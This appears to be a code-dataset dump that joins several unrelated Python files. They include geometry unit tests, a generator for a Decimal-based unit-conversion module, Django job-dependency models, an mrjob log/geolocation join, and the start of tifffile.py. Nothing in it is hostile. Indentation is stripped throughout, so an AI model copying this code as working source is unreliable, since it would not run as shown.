def test_multipolygon_touching_poly(self):
np.random.seed(49)
multipolygon = \
Multipolygon([[np.array([[0,0],[3,0],[3,3],[0,3]])
+ np.random.randint(-50, 50, (1, 2))]
for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
touching = multipolygon.touching(poly)
self.assertEqual(len(touching), 14)
return
def test_multiline_within_poly(self):
np.random.seed(49)
multiline = Multiline([10*np.random.rand(10, 2)
+ np.random.randint(-50, 50, (1, 2)) for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
within = multiline.within(poly)
self.assertEqual(len(within), 8)
return
def test_multipolygon_within_poly(self):
np.random.seed(49)
multipolygon = \
Multipolygon([[np.array([[0,0],[3,0],[3,3],[0,3]])
+ np.random.randint(-50, 50, (1, 2))]
for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
within = multipolygon.within(poly)
self.assertEqual(len(within), 8)
return
if __name__ == "__main__":
unittest.main()
| mit | 7,244,258,512,799,947,000 | 38.788732 | 90 | 0.524071 | false |
ActiveState/code | recipes/Python/577652_Unit_Conversions_Using_Decimal/recipe-577652.py | 1 | 19568 | """
This recipe generates a module conversion.py and a convertTest.txt file
that is used to test conversion.py when this script is run.
conversion.py is built from the tables defining the unit conversions and:
* uses Decimal from the decimal module as the base class, with unit types as class properties
* provides exact decimal representation
* provides control over precision
* provides control over rounding to meet legal or regulatory requirements
* tracks significant decimal places
* produces results that match calculations done by hand
conversion.py supplies the following classes:
Distance
Area
Volumn
Time
Velocity
Acceleration
Mass
Force
Weight
Pressure
Frequency
Power
Temperature
"""
from decimal import *
header = """
conversion.py
Unit Conversion
Dave Bailey
4/10/2011
The conversion.py module uses Decimal from the decimal module as its base class.
decimal is based on the General Decimal Arithmetic Specification,
IEEE standard 854-1987.
conversion provides:
    exact decimal representation,
    control over precision,
    control over rounding to meet legal or regulatory requirements,
    tracking of significant decimal places;
    results match calculations done by hand.
"""
examples = """
-- Examples:
>>> d = Distance(0.0)
>>> d.mi = 1.0
>>> print 'ft -> mile %.3f, %f, %s, %r' % (d.ft,d.ft,d.ft,d.ft)
ft -> mile 5280.000, 5280.000000, 5280.000000000000000000000000, Decimal('5280.000000000000000000000000')
>>> getcontext().prec = 28
>>> d = Distance(0.0)
>>> d.mi = 1.0
>>> print 'ft -> mile %.3f, %f, %s, %r' % (d.ft,d.ft,d.ft,d.ft)
ft -> mile 5280.000, 5280.000000, 5280.000000000000000000000000, Decimal('5280.000000000000000000000000')
>>> getcontext().prec = 52
>>> d = Distance(0.0)
>>> d.mi = 1.0
>>> print 'ft -> mile %.3f, %f, %s, %r' % (d.ft,d.ft,d.ft,d.ft)
ft -> mile 5280.000, 5280.000000, 5279.999999999999999999999999588007935999999954845670, Decimal('5279.999999999999999999999999588007935999999954845670')
>>> getcontext().prec = 28
>>> with localcontext() as ctx:
... getcontext().prec = 52
... d = Distance(0.0)
... d.mi = 1.0
... print 'ft -> mile %.3f, %f, %s, %r' % (d.ft,d.ft,d.ft,d.ft)
ft -> mile 5280.000, 5280.000000, 5279.999999999999999999999999588007935999999954845670, Decimal('5279.999999999999999999999999588007935999999954845670')
>>> getcontext().prec
28
>>> d.ft
Decimal('5280.000000000000000000000000')
>>> d0 = Distance('.10')
>>> d = Distance(d0+d0+d0-Decimal('.30'))
>>> '%r' % d.m
"Decimal('0.00')"
>>> d = Distance(.10 + .10 + .10 - .30)
>>> '%r' % d.m
"Decimal('5.5511151231257827021181583404541015625E-17')"
>>> d.m = '1.0'
>>> d.ft
Decimal('3.28083989501312300000')
>>> d.inch
Decimal('39.370078740157476000000')
>>> d.m = 1.0
>>> d.ft
Decimal('3.2808398950131230000')
>>> d.inch
Decimal('39.37007874015747600000')
>>> print d
1 meters (m)
0.000621371 miles (mi)
1.09361 yard (yd)
3.28084 feet (ft)
39.3701 inch (inch)
0.001 kilometers (km)
100 centimeters (cm)
1000 millimeters (mm)
1e+09 nanometer (nm)
>>> d
Decimal('1') meters (m)
Decimal('0.0006213711922373339015151515152') miles (mi)
Decimal('1.093613298337707666666666667') yard (yd)
Decimal('3.2808398950131230000') feet (ft)
Decimal('39.37007874015747600000') inch (inch)
Decimal('0.0010') kilometers (km)
Decimal('1.0E+2') centimeters (cm)
Decimal('1.0E+3') millimeters (mm)
Decimal('1.0E+9') nanometer (nm)
# distance = vt+.5at**2
>>> v = Velocity(49.0332501432)
>>> a = Acceleration(-9.80665002864) # gravity
>>> t = Time(0.0)
>>> print 'initial velocity = %f mps = %f fps' % (v.mps,v.fps)
initial velocity = 49.033250 mps = 160.870243 fps
>>> for sec in range(20):
... t.sec = sec
... d = v*t + Decimal(.5)*a*t**2
... height = Distance(d)
... if height < 0: break
... print 't',t.sec,'height',height.m,'m',height.ft,'ft'
t 0 height 0E-47 m 0E-66 ft
t 1 height 44.12992512888000007365008059 m 144.7832189267716379167004149 ft
t 2 height 78.45320022912000013093347661 m 257.3923892031495785185785154 ft
t 3 height 102.9698253007200001718501880 m 337.8275108291338218056343013 ft
t 4 height 117.6798003436800001964002149 m 386.0885838047243677778677731 ft
t 5 height 122.5831253580000002045835572 m 402.1756081299212164352789303 ft
t 6 height 117.6798003436800001964002149 m 386.0885838047243677778677731 ft
t 7 height 102.9698253007200001718501881 m 337.8275108291338218056343016 ft
t 8 height 78.4532002291200001309334767 m 257.3923892031495785185785157 ft
t 9 height 44.1299251288800000736500806 m 144.7832189267716379167004149 ft
t 10 height 0E-25 m 0E-44 ft
from decimal import *
"""
constants = """
from decimal import *
GRAVITY = Decimal('9.80665002864') # m/s2
FT_IN_MI = Decimal('5280.0')
FT_IN_M = Decimal('3.2808398950131230000')
FT_IN_YD = Decimal('3.0')
INCH_IN_FT = Decimal('12.0')
MI_IN_M = FT_IN_M / FT_IN_MI
YD_IN_M = FT_IN_M / FT_IN_YD
INCH_IN_M = FT_IN_M * INCH_IN_FT
KM_IN_M = Decimal('1.0e-3')
CM_IN_M = Decimal('1.0e2')
MM_IN_M = Decimal('1.0e3')
NM_IN_M = Decimal('1.0e9')
SEC_IN_MIN = Decimal('60.0')
MIN_IN_HR = Decimal('60.0')
DAY_IN_WK = Decimal('7.0')
HR_IN_DAY = Decimal('24.0')
DAY_IN_YR = Decimal('365.24218967')
HR_IN_SEC = Decimal('1.0')/(SEC_IN_MIN * MIN_IN_HR)
G_IN_KG = Decimal('1.0e3')
LB_IN_NEWTON = Decimal('.224808942911188')
OZ_IN_G = Decimal('0.0352739619000')
OZ_IN_LB = Decimal('16.0')
W_IN_HP = Decimal('745.699872')
"""
tables = [
[
["Distance","meters"],
["meters","m","Decimal(self)","self._update(Decimal(value))"],
["miles","mi","Decimal(self) * MI_IN_M","self._update(Decimal(value) * Decimal('1.0')/MI_IN_M)"],
["yard","yd","Decimal(self) * YD_IN_M","self._update(Decimal(value) * Decimal('1.0')/YD_IN_M)"],
["feet","ft","Decimal(self) * FT_IN_M","self._update(Decimal(value) * Decimal('1.0')/FT_IN_M)"],
["inch","inch","Decimal(self) * INCH_IN_M","self._update(Decimal(value) * Decimal('1.0')/INCH_IN_M)"],
["kilometers","km","Decimal(self) * KM_IN_M","self._update(Decimal(value) * Decimal('1.0')/KM_IN_M)"],
["centimeters","cm","Decimal(self) * CM_IN_M","self._update(Decimal(value) * Decimal('1.0')/CM_IN_M)"],
["millimeters","mm","Decimal(self) * MM_IN_M","self._update(Decimal(value) * Decimal('1.0')/MM_IN_M)"],
["nanometer","nm","Decimal(self) * NM_IN_M","self._update(Decimal(value) * Decimal('1.0')/NM_IN_M)"],
],
[
["Area","sq_meters"],
["sq_meters","m2","Decimal(self)","self._update(Decimal(value))"],
["sq_miles","mi2","Decimal(self) * (MI_IN_M * MI_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(MI_IN_M * MI_IN_M))"],
["sq_yard","yd2","Decimal(self) * (YD_IN_M * YD_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(YD_IN_M * YD_IN_M))"],
["sq_feet","ft2","Decimal(self) * (FT_IN_M * FT_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(FT_IN_M * FT_IN_M))"],
["sq_inch","inch2","Decimal(self) * (INCH_IN_M * INCH_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(INCH_IN_M * INCH_IN_M))"],
["sq_kilometers","km2","Decimal(self) * (KM_IN_M * KM_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(KM_IN_M * KM_IN_M))"],
["sq_centimeters","cm2","Decimal(self) * (CM_IN_M * CM_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(CM_IN_M * CM_IN_M))"],
["sq_millimeters","mm2","Decimal(self) * (MM_IN_M * MM_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(MM_IN_M * MM_IN_M))"],
],
[
["Volumn","cubic_meters"],
["cubic_meters","m3","Decimal(self)","self._update(Decimal(value))"],
["cubic_miles","mi3","Decimal(self) * (MI_IN_M * MI_IN_M * MI_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(MI_IN_M * MI_IN_M * MI_IN_M))"],
["cubic_yard","yd3","Decimal(self) * (YD_IN_M * YD_IN_M * YD_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(YD_IN_M * YD_IN_M * YD_IN_M))"],
["cubic_feet","ft3","Decimal(self) * (FT_IN_M * FT_IN_M * FT_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(FT_IN_M * FT_IN_M * FT_IN_M))"],
["cubic_inch","inch3","Decimal(self) * (INCH_IN_M * INCH_IN_M * INCH_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(INCH_IN_M * INCH_IN_M * INCH_IN_M))"],
["cubic_kilometers","km3","Decimal(self) * (KM_IN_M * KM_IN_M * KM_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(KM_IN_M * KM_IN_M * KM_IN_M))"],
["cubic_centimeters","cm3","Decimal(self) * (CM_IN_M * CM_IN_M * CM_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(CM_IN_M * CM_IN_M * CM_IN_M))"],
["cubic_millimeters","mm3","Decimal(self) * (MM_IN_M * MM_IN_M * MM_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(MM_IN_M * MM_IN_M * MM_IN_M))"],
],
[
["Time","sec"],
["sec","sec","Decimal(self)","self._update(Decimal(value))"],
["min","min","Decimal(self) * Decimal('1.0')/SEC_IN_MIN","self._update(Decimal(value) * SEC_IN_MIN)"],
["hour","hr","Decimal(self) * Decimal('1.0')/(SEC_IN_MIN*MIN_IN_HR)","self._update(Decimal(value) * (SEC_IN_MIN*MIN_IN_HR))"],
["day","day","Decimal(self) * Decimal('1.0')/(HR_IN_DAY*SEC_IN_MIN*MIN_IN_HR)","self._update(Decimal(value) * (HR_IN_DAY*SEC_IN_MIN*MIN_IN_HR))"],
["week","wk","Decimal(self) * Decimal('1.0')/(DAY_IN_WK*HR_IN_DAY*SEC_IN_MIN*MIN_IN_HR)","self._update(Decimal(value) * (DAY_IN_WK*HR_IN_DAY*SEC_IN_MIN*MIN_IN_HR))"],
["year","yr","Decimal(self) * Decimal('1.0')/(DAY_IN_YR*HR_IN_DAY*SEC_IN_MIN*MIN_IN_HR)","self._update(Decimal(value) * (DAY_IN_YR*HR_IN_DAY*SEC_IN_MIN*MIN_IN_HR))"],
],
[
["Velocity","meters_per_sec"],
["meters_per_sec","mps","Decimal(self)","self._update(Decimal(value))"],
["miles_per_sec","mips","Decimal(self) * MI_IN_M","self._update(Decimal(value) * Decimal('1.0')/MI_IN_M)"],
["miles_per_hr","mph","Decimal(self) * (MI_IN_M * SEC_IN_MIN * MIN_IN_HR)","self._update(Decimal(value) * Decimal('1.0')/(MI_IN_M * SEC_IN_MIN * MIN_IN_HR))"],
["ft_per_sec","fps","Decimal(self) * FT_IN_M","self._update(Decimal(value) * Decimal('1.0')/FT_IN_M)"],
["inch_per_sec","inchps","Decimal(self) * INCH_IN_M","self._update(Decimal(value) * Decimal('1.0')/INCH_IN_M)"],
["km_per_hour","kmph","Decimal(self) * (KM_IN_M * SEC_IN_MIN * MIN_IN_HR)","self._update(Decimal(value) * Decimal('1.0')/(KM_IN_M * SEC_IN_MIN * MIN_IN_HR))"],
["km_per_sec","kmps","Decimal(self) * KM_IN_M","self._update(Decimal(value) * Decimal('1.0')/KM_IN_M)"],
],
[
["Acceleration","meters_per_sq_sec"],
["meters_per_sq_sec","mps2","Decimal(self)","self._update(Decimal(value))"],
["miles_per_sq_sec","mips2","Decimal(self) * MI_IN_M","self._update(Decimal(value) * Decimal('1.0')/MI_IN_M)"],
["miles_per_hr_per_sec","mphps","Decimal(self) * (MI_IN_M * SEC_IN_MIN * MIN_IN_HR)","self._update(Decimal(value) * Decimal('1.0')/(MI_IN_M * SEC_IN_MIN * MIN_IN_HR))"],
["ft_per_sq_sec","fps2","Decimal(self) * FT_IN_M","self._update(Decimal(value) * Decimal('1.0')/FT_IN_M)"],
["inch_per_sq_sec","ips2","Decimal(self) * INCH_IN_M","self._update(Decimal(value) * Decimal('1.0')/INCH_IN_M)"],
["km_per_hour_per_sec","kmphps","Decimal(self) * (KM_IN_M * SEC_IN_MIN * MIN_IN_HR)","self._update(Decimal(value) * Decimal('1.0')/(KM_IN_M * SEC_IN_MIN * MIN_IN_HR))"],
["km_per_sq_sec","kmps2","Decimal(self) * KM_IN_M","self._update(Decimal(value) * Decimal('1.0')/KM_IN_M)"],
],
[
["Mass","kilogram"],
["kilogram","kg","Decimal(self)","self._update(Decimal(value))"],
["gram","g","Decimal(self) * Decimal('1000.0')","self._update(Decimal(value) / Decimal('1000.0'))"],
["ounce","oz","Decimal(self) * OZ_IN_G * Decimal('1000.0')","self._update(Decimal(value) / OZ_IN_G / Decimal('1000.0'))"],
["pounds","lbm","Decimal(self) * (OZ_IN_G / OZ_IN_LB) * Decimal('1000.0')","self._update(Decimal(value)* OZ_IN_LB / OZ_IN_G / Decimal('1000.0') )"],
],
[
["Force","newton"], # m*kg*s**2
["newton","N","Decimal(self)","self._update(Decimal(value))"],
["kilogram-force","kgf","Decimal(self) / GRAVITY","self._update(Decimal(value) * GRAVITY)"],
["dyne","dyn","Decimal(self) * Decimal('100000.0')","self._update(Decimal(value) / Decimal('100000.0'))"],
["pound-force","lbf","Decimal(self) * (G_IN_KG * OZ_IN_G) / (OZ_IN_LB*GRAVITY)","self._update(Decimal(value) * (OZ_IN_LB * GRAVITY) / (G_IN_KG * OZ_IN_G))"],
],
[
["Weight","kilogram"], # m*kg*s**2
["kilogram","kg","Decimal(self)","self._update(Decimal(value))"],
["gram","g","Decimal(self) * G_IN_KG ","self._update(Decimal(value) / G_IN_KG)"],
["ounce","oz","Decimal(self) * G_IN_KG * OZ_IN_G ","self._update(Decimal(value) / (G_IN_KG * OZ_IN_G))"],
["pounds","lbm","Decimal(self) * (G_IN_KG * OZ_IN_G) / (OZ_IN_LB)","self._update(Decimal(value) * (OZ_IN_LB ) / (G_IN_KG * OZ_IN_G))"],
],
[
["Pressure","pascal "],
["pascal","Pa","Decimal(self)","self._update(Decimal(value))"],
["newton_per_sq_m","Nm2","Decimal(self)","self._update(Decimal(value))"],
["kilogram_per_sq_m","kgfpm2","Decimal(self) * Decimal('1.0')/GRAVITY","self._update(Decimal(value) * GRAVITY)"],
["pound_per_sq_inch","psi","Decimal(self) * (LB_IN_NEWTON/(INCH_IN_M * INCH_IN_M))","self._update(Decimal(value) * (INCH_IN_M * INCH_IN_M) / LB_IN_NEWTON)"],
["pound_per_sq_ft","psf","Decimal(self) * LB_IN_NEWTON/(FT_IN_M * FT_IN_M)","self._update(Decimal(value) * (FT_IN_M * FT_IN_M) / LB_IN_NEWTON)"],
],
[
["Frequency","Frequency"],
["hertz","Hz","Decimal(self)","self._update(Decimal(value))"],
["KHz","KHz","Decimal(self) * Decimal('1.0')/Decimal(1.0e3)","self._update(Decimal(value) * Decimal('1.0e3'))"],
["MHz","MHz","Decimal(self) * Decimal('1.0')/Decimal(1.0e6)","self._update(Decimal(value) * Decimal('1.0e6'))"],
["GHz","GHz","Decimal(self) * Decimal('1.0')/Decimal(1.0e9)","self._update(Decimal(value) * Decimal('1.0e9'))"],
],
[
["Power","Power"],
["watts","W","Decimal(self)","self._update(Decimal(value))"],
["kilowatt","KW","Decimal(self) * Decimal('1.0')/Decimal('1.0e3')","self._update(Decimal(value) * Decimal('1.0e3'))"],
["megawatt","MW","Decimal(self) * Decimal('1.0')/Decimal('1.0e6')","self._update(Decimal(value) * Decimal('1.0e6'))"],
["Horsepower","hp","Decimal(self) * Decimal('1.0')/W_IN_HP","self._update(Decimal(value) * W_IN_HP)"],
["joulepersec","jps","Decimal(self)","self._update(Decimal(value))"],
],
[
["Temperature","degreeK"],
["Kelvin","K","Decimal(self)","self._update(Decimal(value))"],
["Fahrenheit","F","((Decimal(self) - Decimal('273.15')) * Decimal('9.0')/Decimal('5.0')) + Decimal('32.0')","self._update((Decimal(value) - Decimal('32.0')) * (Decimal('5.0')/Decimal('9.0')) + Decimal('273.15'))"],
["Celsius","C","Decimal(self) - Decimal('273.15')","self._update(Decimal(value) + Decimal('273.15'))"],
],
]
def build_class(table):
"build a class for each table i.e. Distance,Velocity,etc."
name, baseunits = table[0]
s = '\nclass %(name)s(Decimal):\n' % locals()
    s += '    __slots__ = ()  # no instance dict, so a misspelled unit attribute (e.g. d.yds instead of d.yd) raises AttributeError\n'
return s
def build_init(table):
"update method"
s = """
def _update(self,dec):
self._exp = dec._exp
self._sign = dec._sign
self._int = dec._int
self._is_special = dec._is_special
"""
return s
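# Note: the _update body emitted above copies Decimal's internal slots
# (_exp, _sign, _int, _is_special), which is how the generated setters
# change the value of an otherwise immutable Decimal subclass in place.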
def build_str_funct(table):
"str method"
fmt1 = " def __str__(self):\n s = ''\n"
fmt2 = " s += '%%g %(units)s (%(abrev)s)\\n' %% self.%(abrev)s\n"
name, baseunits = table[0]
s = fmt1 % locals()
for data in table[1:]:
if len(data) == 3:
units, abrev, value = data
else:
units, abrev, value, value2 = data
s += fmt2 % locals()
s += ' return s[:-1]\n'
return s
def build_repr_funct(table):
"repr method"
fmt1 = " def __repr__(self):\n s = ''\n"
fmt2 = " s += '%%r %(units)s (%(abrev)s)\\n' %% self.%(abrev)s\n"
name, baseunits = table[0]
s = fmt1 % locals()
for data in table[1:]:
if len(data) == 3:
units, abrev, value = data
else:
units, abrev, value, value2 = data
s += fmt2 % locals()
s += ' return s[:-1]\n'
return s
def build_methods(table):
"setter and getter property methods"
fmt = """ @property
def %(abrev)s(self):
return eval("%(value)s")
@%(abrev)s.setter
def %(abrev)s(self, value):
eval("%(value2)s")\n"""
s = ''
name, baseunits = table[0]
for data in table[1:]:
if len(data) == 3:
units, abrev, value = data
value2 = str(Decimal(1.0)/eval(value))
else:
units, abrev, value, value2 = data
s += fmt % locals()
return s
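# For illustration, the fmt template above expands the "miles" row to
# roughly the following generated source (a sketch, not stored anywhere):
#     @property
#     def mi(self):
#         return eval("Decimal(self) * MI_IN_M")
#     @mi.setter
#     def mi(self, value):
#         eval("self._update(Decimal(value) * Decimal('1.0')/MI_IN_M)")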
def build_header(header,tables,examples):
"build module description"
s = header
s += 'Conversions:\n'
for table in tables:
s += ' %s\n' % table[0][0]
s += examples
s += '\n"""\n'
return s
def build_doctest_call(modulename, testfilename):
"create method to call doctest on module and module test file"
s = """
def test():
"test method tests examples and testfile"
print '\\n**** %s test ****\\n'
import doctest
import %s
doctest.testmod(%s, verbose=True, report=True)
print doctest.master.summarize()
doctest.testfile('%s', verbose=True, report=True)
print doctest.master.summarize()
if __name__ == '__main__':
test()
""" % (modulename,modulename,modulename,testfilename)
return s
def build_module(tables, modulename):
"build module from data table "
s = '"""\n'
s += build_header(header, tables, examples)
s += constants
for table in tables:
s += build_class(table)
s += build_init(table)
s += build_str_funct(table)
s += build_repr_funct(table)
s += build_methods(table)
s += build_doctest_call(modulename, testfilename)
return s
def build_test(table):
"build a test for all getters and setters for each class"
name, baseunits = table[0]
s = '\n%s conversion class\n' % name
s += '>>> from conversion import %s\n' % (name)
s += '>>> %s = %s(0.0)\n' % (name.lower()[0],name)
args = [arg[1] for arg in table[1:]]
for arg in args:
s += '>>> %s.%s = 1.0\n' % (name.lower()[0],arg)
s += '>>> print %s\n' % (name.lower()[0])
x = eval('%s()' % name)
exec('x.%s = 1.0' % arg)
for line in str(x).split('\n'):
s += '%s\n' % line
s += '>>> %s\n' % (name.lower()[0])
x = eval('%s()' % name)
exec('x.%s = 1.0' % arg)
for line in repr(x).split('\n'):
s += '%s\n' % line
s += '\n'
return s
def build_doctest(modulename,testfilename):
"builds test file for testing %s.py based on table data" % (modulename)
s = 'building %s' % testfilename
s += '\n## **** %s Test ****\n' % (modulename)
s += 'from %s import *' % (modulename)
s += '"""'
for table in tables:
s += build_test(table)
return s
if __name__ == '__main__':
filename = 'conversion.py'
modulename = filename[:-3]
testfilename = modulename+'Test.txt'
print 'building', filename
fp = open(filename,'w')
s = build_module(tables, modulename)
print >>fp,s
fp.close()
from conversion import *
print 'building', testfilename
fp = open(testfilename,'w')
s = build_doctest(modulename,testfilename)
print >>fp,s
fp.close()
| mit | -1,155,592,190,145,512,700 | 41.354978 | 218 | 0.596944 | false |
ChrisCooper/pipeline-nanny | taskmaster/models.py | 1 | 3179 | from django.db import models
class JobGroup(models.Model):
name = models.TextField()
nanny_creation_date = models.DateTimeField('date created', auto_now_add=True)
    def new_job(self, **kwargs):
        return Job.objects.create(group=self, **kwargs)
def __repr__(self):
return "<Job group: {name} ({n_jobs} jobs)>".format(name=self.name, n_jobs=self.jobs.count())
def __str__(self):
return self.__repr__()
#def ready_jobs(self):
#return self.jobs.
class Job(models.Model):
name = models.TextField()
group = models.ForeignKey('JobGroup', related_name='jobs')
child_jobs = models.ManyToManyField('self', symmetrical=False, related_name='parent_jobs')
nanny_creation_date = models.DateTimeField('date created', auto_now_add=True)
command = models.TextField()
stdout_file_location = models.TextField()
stderr_file_location = models.TextField()
WAITING = 0
READY = 1
RUNNING = 2
COMPLETED = 3
ERRORED = 4
KILLED = 5
STATUSES = (
(WAITING, 'Waiting'), # waiting on parent jobs
(READY, 'Ready'), # Can be started any time
(RUNNING, 'Running'), # Has been started
(COMPLETED, 'Completed'), # Exited with zero code
(ERRORED, 'Errored-out'), # Exited with a non-zero status
(KILLED, 'Killed'), # Used too many resources and was killed
)
status = models.IntegerField(choices=STATUSES, default=READY)
def __repr__(self):
return "<{status} Job: {name}, {n_parents} parents, {n_children} children>".format(
status=self.get_status_display(),
name=self.name,
n_parents=self.parent_jobs.count(),
n_children=self.child_jobs.count())
def add_child(self, dependant_job):
if dependant_job == self:
raise InvalidDependencyException("Error: Can't add a job as its own child. Job is {0}".format(self))
if self.depends_on(dependant_job):
raise InvalidDependencyException("Error: Dependency loops are not allowed. {0} already depends on {1}".format(self, dependant_job))
if dependant_job in self.child_jobs.all():
raise InvalidDependencyException("Error: Child job has already been added. {1} already depends on {0}".format(self, dependant_job))
if self.status not in (Job.READY, Job.WAITING):
raise InvalidDependencyException("Error: Can't add a child to a parent job that's already started. {0} already running (child: {1})".format(self, dependant_job))
if dependant_job.status not in (Job.READY, Job.WAITING):
raise InvalidDependencyException("Error: Can't add a child job that's already started. {1} already running (parent: {0})".format(self, dependant_job))
self.child_jobs.add(dependant_job)
dependant_job.status = Job.WAITING
self.save()
dependant_job.save()
def add_parent(self, prerequisite_job):
prerequisite_job.add_child(self)
def add_parents(self, prerequisite_jobs):
for job in prerequisite_jobs:
self.add_parent(job)
def add_children(self, dependent_jobs):
for job in dependent_jobs:
self.add_child(job)
def depends_on(self, job):
if (job in self.parent_jobs.all()):
return True
for dependency in self.parent_jobs.all():
if dependency.depends_on(job):
return True
return False
class InvalidDependencyException(Exception):
pass
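# Minimal usage sketch (assumes a configured Django project; the names and
# commands are illustrative only):
#     group = JobGroup.objects.create(name='pipeline')
#     index = group.new_job(name='index', command='build-index')
#     align = group.new_job(name='align', command='run-align')
#     index.add_child(align)          # align.status becomes Job.WAITING
#     assert align.depends_on(index)  # True, via the recursive parent walk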
| mit | 4,321,678,611,756,257,300 | 34.322222 | 164 | 0.705253 | false |
explorerwjy/jw_anly502 | PS03/join3.py | 1 | 1856 | #!/usr/bin/env python2
# To get started with the join,
# try creating a new directory in HDFS that has both the fwiki data AND the maxmind data.
import mrjob
from mrjob.job import MRJob
from mrjob.step import MRStep
from weblog import Weblog # imports class defined in weblog.py
import os
import re
import sys
import heapq
class FwikiMaxmindJoin(MRJob):
def mapper(self, _, line):
# Is this a weblog file, or a MaxMind GeoLite2 file?
filename = mrjob.compat.jobconf_from_env("map.input.file")
if "top1000ips_to_country.txt" in filename:
self.increment_counter("Status","top1000_ips_to_country file found",1)
try:
(ipaddr, country) = line.strip().split("\t")
yield ipaddr, "+"+country
except ValueError as e:
pass
else:
try:
o = Weblog(line)
except ValueError:
sys.stderr.write("Invalid Logfile line :{}\n".format(line))
return
if o.wikipage() == "Main_Page":
yield o.ipaddr, line
def reducer(self, key, values):
country = None
for v in values:
if v[0:1] == '+':
country = v[1:]
continue
if not country:
self.increment_counter("Warning","No Country Found", 1)
continue
o = Weblog(v)
yield "Geolocated",[o.date,country,v]
def mapper2(self,key,value):
country = value[1]
#country=re.findall('\[\"([^\d."]+)\",',value)[0]
yield country,1
def reducer2(self,key,values):
yield key,sum(values)
def mapper3(self,key,value):
yield "TOP10",(value,key)
def reducer3(self,key,values):
for count in heapq.nlargest(10,values):
yield key,count
def steps(self):
return [
MRStep(mapper=self.mapper,reducer=self.reducer),
MRStep(mapper=self.mapper2,reducer=self.reducer2),
MRStep(mapper=self.mapper3,reducer=self.reducer3)
]
if __name__=="__main__":
FwikiMaxmindJoin.run()
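# Example local invocation (hypothetical input paths; weblog.py must be
# importable):
#     python join3.py top1000ips_to_country.txt access.log > top10_countries.tsv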
| cc0-1.0 | 5,963,624,779,465,666,000 | 26.701493 | 89 | 0.651401 | false |
jni/cellom2tif | cellom2tif/tifffile.py | 1 | 173408 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# tifffile.py
# Copyright (c) 2008-2014, Christoph Gohlke
# Copyright (c) 2008-2014, The Regents of the University of California
# Produced at the Laboratory for Fluorescence Dynamics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holders nor the names of any
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Read and write image data from and to TIFF files.
Image and metadata can be read from TIFF, BigTIFF, OME-TIFF, STK, LSM, NIH,
SGI, ImageJ, MicroManager, FluoView, SEQ and GEL files.
Only a subset of the TIFF specification is supported, mainly uncompressed
and losslessly compressed 2**(0 to 6) bit integer, 16, 32 and 64-bit float,
grayscale and RGB(A) images, which are commonly used in bio-scientific imaging.
Specifically, reading JPEG and CCITT compressed image data or EXIF, IPTC, GPS,
and XMP metadata is not implemented.
Only primary info records are read for STK, FluoView, MicroManager, and
NIH image formats.
TIFF, the Tagged Image File Format, is under the control of Adobe Systems.
BigTIFF allows for files greater than 4 GB. STK, LSM, FluoView, SGI, SEQ, GEL,
and OME-TIFF, are custom extensions defined by Molecular Devices (Universal
Imaging Corporation), Carl Zeiss MicroImaging, Olympus, Silicon Graphics
International, Media Cybernetics, Molecular Dynamics, and the Open Microscopy
Environment consortium respectively.
For command line usage run ``python tifffile.py --help``
:Author:
`Christoph Gohlke <http://www.lfd.uci.edu/~gohlke/>`_
:Organization:
Laboratory for Fluorescence Dynamics, University of California, Irvine
:Version: 2014.08.24
Requirements
------------
* `CPython 2.7 or 3.4 <http://www.python.org>`_
* `Numpy 1.8.2 <http://www.numpy.org>`_
* `Matplotlib 1.4 <http://www.matplotlib.org>`_ (optional for plotting)
* `Tifffile.c 2013.11.05 <http://www.lfd.uci.edu/~gohlke/>`_
(recommended for faster decoding of PackBits and LZW encoded strings)
Notes
-----
The API is not stable yet and might change between revisions.
Tested on little-endian platforms only.
Other Python packages and modules for reading bio-scientific TIFF files:
* `Imread <http://luispedro.org/software/imread>`_
* `PyLibTiff <http://code.google.com/p/pylibtiff>`_
* `SimpleITK <http://www.simpleitk.org>`_
* `PyLSM <https://launchpad.net/pylsm>`_
* `PyMca.TiffIO.py <http://pymca.sourceforge.net/>`_ (same as fabio.TiffIO)
* `BioImageXD.Readers <http://www.bioimagexd.net/>`_
* `Cellcognition.io <http://cellcognition.org/>`_
* `CellProfiler.bioformats
